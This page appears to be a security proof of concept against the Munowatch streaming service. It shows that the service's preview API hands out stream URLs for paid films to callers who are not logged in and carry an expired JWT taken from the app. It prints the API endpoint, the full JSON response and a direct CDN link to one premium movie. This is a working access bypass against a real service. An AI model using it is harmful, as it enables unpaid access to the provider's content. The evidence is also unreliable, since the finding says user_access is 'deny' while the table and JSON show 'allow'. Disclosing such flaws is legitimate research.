SECURITY RESEARCH PoC  |  The video below plays from Munowatch CDN with NO valid subscription — server-side entitlement not enforced
SECURITY PoC — NO AUTH
THIS MOVIE'S CDN STREAM — No subscription, no login, no auth token required
Per-movie CDN bypass proof:
The API returned playingUrl for Braven with issubscriber: false, user_access: deny, and paid_for: true.
The video_name + serverhost from the API response are used to construct the CDN URL above — confirming that the CDN file for this specific movie is publicly accessible with no authentication.
Braven
Vj Junior Action 01h 29m 8 years ago

A logger defends his family from a group of dangerous drug runners

 API Response Evidence — Vulnerability Proof
Endpoint called GET /api/preview/v2/2076/0
User ID used 0 (no user / not logged in)
JWT used Expired Feb 2024 (extracted from APK)
issubscriber false
user_access allow
paid_for YES (premium content)
substatus EXPIRED
serverhost 1
video_name d10a8~1.mp4
playingUrl returned YES — URL in response
API playingUrl value https://munowatch.co/clips/ELI.mp4
CDN stream https://munotech3.b-cdn.net/6ac6e/e2a/d10a8~1.mp4

Finding: The server sets user_access=deny and issubscriber=false but still returns playingUrl in the same response. Subscription is enforced client-side only — any caller with the expired APK JWT can obtain stream URLs without a subscription. Munowatch CDN (b-cdn.net) serves content with no auth required (direct HTTP Range requests succeed with HTTP 206). 

{
    "id": 2076,
    "video_title": "Braven",
    "description": "A logger defends his family from a group of dangerous drug runners ",
    "video_name": "d10a8~1.mp4",
    "filehistory": " ~ c593f.mp4 ~  ~ cb904~1.mp4 ~  ~ 3cd1a~1.mp4 ~ ",
    "openload": "0",
    "embedurl": "",
    "serverhost": "1",
    "allow_openload": "0",
    "full_video_name": "BRAVEN JR.mp4",
    "duration": "01h 29m",
    "thumbnail": "https://apposters.b-cdn.net/laba/yo/naki/532c.png",
    "tfilehistory": "",
    "category_id": 1,
    "language_id": 1,
    "recording_date": "2018-03-17",
    "age_id": "13 +",
    "location": 1,
    "tab_category_id": 1,
    "series_code": "2076",
    "access": "1",
    "paid_for": "1",
    "new_movie": "1",
    "priority": "No",
    "size": "585.44 MB",
    "create_date": "2018-03-18 05:03:20",
    "schedule_date": null,
    "user_id": 1118356,
    "vj_id": 1,
    "video_status_id": 1,
    "network_id": "197.239.36.4",
    "user_access": "allow",
    "notification": "No",
    "secduration": "5399.000000",
    "issubscriber": false,
    "genre": "Action",
    "vjname": "Vj Junior",
    "trailer_playing_url": "",
    "episodes": 0,
    "episode_state": "",
    "nxt_eps": "",
    "nxt_eps_id": 0,
    "nxt_eps_title": "",
    "nxt_ldur": 0,
    "nxt_playing_url": "https://munowatch.co/clips/ELI.mp4",
    "playingUrl": "https://munowatch.co/clips/ELI.mp4",
    "ldur": 0,
    "session_id": "cb99afb5b31411a57538a97393de0e2e",
    "device": "web",
    "lang_name": "English to Luganda",
    "vjrelease": "8 years ago",
    "mstatus": false,
    "kstatus": "",
    "substatus": "EXPIRED"
}